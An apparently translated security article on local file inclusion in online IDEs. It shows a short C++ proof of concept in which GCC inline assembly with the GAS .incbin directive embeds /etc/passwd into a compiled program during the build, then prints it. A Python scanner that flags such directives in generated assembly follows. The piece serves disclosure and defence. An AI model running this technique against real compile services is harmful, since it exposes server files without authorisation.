
Online IDE and Local File Inclusion

Recently, many online IDEs have appeared that can compile and run programs, including native applications. Naturally, this raises the question of how secure such services are. Compiled programs run in a sandbox, but compilation itself often happens in an unprotected environment.

GCC + GAS

GCC allows using the asm directive to pass code to GAS, which has a great .incbin directive. With its help, a file can be included as data at the compilation stage. The exploit for C++ then looks like this:

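    #include <stdio.h>

    // Top-level asm: GAS reads the file while assembling, on the build host.
    extern "C" asm(
        ".global _data\n"
        ".data\n"
        "_data:\n"
        ".incbin \"/etc/passwd\"\n"
        ".byte 0"   // NUL terminator so the data prints as a C string
    );

    extern const char _data;
    const char* data = &_data;

    int main()
    {
        // The file contents are already embedded in the binary at this point.
        printf("%s", data);
    }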
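A defensive check for the compile step described above, added here as an example and not part of the original article: it scans the assembly text a compile service would get from `gcc -S` (which stops before the assembler runs) for GAS directives that read files. The function names, the x86 GAS comment handling and the sample input are assumptions constructed for illustration.

```python
import re

# GAS directives that make the assembler read another file at build time.
# .incbin is the one used above; .include is its source-level sibling.
FILE_DIRECTIVES = {".incbin", ".include"}

# Optional labels, then a directive name, then an optional quoted operand.
HEAD = re.compile(r'\s*(?:[\w.$]+\s*:\s*)*(\.\w+)\s*(?:"((?:[^"\\]|\\.)*)")?')

def statements(asm):
    """Yield (line_no, text) per statement: split on newline and ';', dropping
    '#' and /* */ comments. Quoted strings are copied through untouched."""
    line = start = 1
    cur, i, n = [], 0, len(asm)
    while i < n:
        c = asm[i]
        if c == '"':                              # skip to the closing quote
            j = i + 1
            while j < n and asm[j] != '"':
                j += 2 if asm[j] == "\\" else 1
            cur.append(asm[i:j + 1]); line += asm.count("\n", i, j + 1); i = j + 1
        elif asm.startswith("/*", i):             # block comment acts as a space
            j = asm.find("*/", i + 2)
            j = n if j < 0 else j + 2
            cur.append(" "); line += asm.count("\n", i, j); i = j
        elif c == "#":                            # x86 GAS line comment (assumed)
            j = asm.find("\n", i)
            i = n if j < 0 else j
        elif c in ";\n":                          # statement separator
            yield start, "".join(cur)
            cur = []; line += (c == "\n"); start = line; i += 1
        else:
            cur.append(c); i += 1
    yield start, "".join(cur)

def find_file_directives(asm):
    """Return [(line_no, directive, path)] for every file-reading directive."""
    hits = []
    for line_no, stmt in statements(asm):
        m = HEAD.match(stmt)
        # Lower-casing can only over-report, which is fine for a detector.
        if m and m.group(1).lower() in FILE_DIRECTIVES:
            hits.append((line_no, m.group(1).lower(), m.group(2)))
    return hits

# Constructed sample, shaped like `gcc -S` output for the snippet above.
SAMPLE_ASM = r'''
    .data
_data:
    .incbin "/etc/passwd"
    .byte 0
    .string "text that mentions .incbin \"x\""
    /* note */ .incbin "other.bin" ; ret
'''
```

Scanning the generated assembly rather than the submitted source means the check sees the directive in its final form. It is a detection signal for the compile step and does not replace running the compiler inside the same sandbox as the compiled program.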


Source: https://habr.com/ru/post/183976/

